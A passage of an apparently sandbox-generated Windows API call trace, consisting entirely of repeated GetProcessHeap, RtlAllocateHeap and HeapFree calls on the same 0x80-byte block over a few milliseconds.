RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.961] GetProcessHeap () returned 0x280000 [0057.961] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.961] GetProcessHeap () returned 0x280000 [0057.962] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.962] GetProcessHeap () returned 0x280000 [0057.962] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.963] GetProcessHeap () returned 0x280000 [0057.963] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.963] GetProcessHeap () returned 0x280000 [0057.964] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.964] GetProcessHeap () returned 0x280000 [0057.964] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.964] GetProcessHeap () returned 0x280000 [0057.965] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.965] GetProcessHeap () returned 0x280000 [0057.965] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.965] GetProcessHeap () returned 0x280000 [0057.966] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.966] GetProcessHeap () returned 0x280000 [0057.966] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.966] GetProcessHeap () returned 0x280000 [0057.967] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.967] GetProcessHeap () returned 0x280000 [0057.967] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.968] GetProcessHeap () returned 0x280000 [0057.968] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.968] GetProcessHeap () returned 0x280000 [0057.969] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.969] GetProcessHeap () returned 0x280000 [0057.969] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.969] GetProcessHeap () returned 0x280000 [0057.969] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.969] GetProcessHeap () returned 0x280000 [0057.969] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.969] GetProcessHeap () returned 0x280000 [0057.969] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.969] GetProcessHeap () returned 0x280000 [0057.969] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.969] GetProcessHeap () returned 0x280000 [0057.969] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.969] GetProcessHeap () returned 0x280000 [0057.969] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.969] GetProcessHeap () returned 0x280000 [0057.969] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.969] GetProcessHeap () returned 0x280000 [0057.969] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.969] GetProcessHeap () returned 0x280000 [0057.969] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.969] GetProcessHeap () returned 0x280000 [0057.969] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.969] GetProcessHeap () returned 0x280000 [0057.969] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.969] GetProcessHeap () returned 0x280000 [0057.969] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.969] GetProcessHeap () returned 0x280000 [0057.969] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.969] GetProcessHeap () returned 0x280000 [0057.969] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.969] GetProcessHeap () returned 0x280000 [0057.969] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.969] GetProcessHeap () returned 0x280000 [0057.969] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.969] GetProcessHeap () returned 0x280000 [0057.969] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.969] GetProcessHeap () returned 0x280000 [0057.970] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.970] GetProcessHeap () returned 0x280000 [0057.970] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.970] GetProcessHeap () returned 0x280000 [0057.970] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.970] GetProcessHeap () returned 0x280000 [0057.970] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.970] GetProcessHeap () returned 0x280000 [0057.970] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x2e17a0 | out: hHeap=0x280000) returned 1 [0057.970] GetProcessHeap () returned 0x280000 [0057.970] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x0, Size=0x80) returned 0x2e17a0 [0057.970] 